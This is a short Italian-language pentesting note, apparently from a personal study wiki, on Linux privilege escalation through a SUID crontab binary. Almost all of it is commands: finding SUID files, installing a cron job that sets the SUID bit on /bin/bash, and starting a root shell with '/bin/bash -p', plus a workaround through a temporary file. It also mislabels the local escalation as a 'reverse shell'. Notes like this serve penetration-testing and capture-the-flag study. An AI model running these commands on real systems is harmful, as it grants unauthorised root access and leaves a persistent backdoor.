Crontab

---

tags Permessi_SUID privilage_escalation Linux_Privilage_Escalation Crontab_PrivEsc

---

Se tramite il comando:

find / -perm -4000 2>/dev/null

Troviamo :

/usr/bin/crontab

Possiamo ottenere una reverse shell con privilegi di root, ci basta eseguire i seguenti comandi:

crontab -e
 
#All'interno del file incolliamo
 
* * * * * chmod u+s /bin/bash

Dovresti vedere un messaggio come crontab: installing new crontab.

Con il comando:

ls -l /bin/bash

Dovresti vedere che i permessi sono cambiati in -rwsr-xr-x. La s indica che il bit SUID è attivo.

Ora esegui:

/bin/bash -p
 
#Oppure
 
/bin/bash
 

Per ottenere una shell di root.

Problemi con Vim

Se l’edito Vim ti da problemi perchè non ti lascia salvare possiamo fare nel seguente modo:

echo "* * * * * chmod u+s /bin/bash" > /tmp/mycron
 
crontab /tmp/mycron
 

crontab -l

Dovresti vedere l’output * * * * * chmod u+s /bin/bash

rm /tmp/mycron

Rimuovi il file temporaneo

/bin/bash     #Per ottenere la shell da root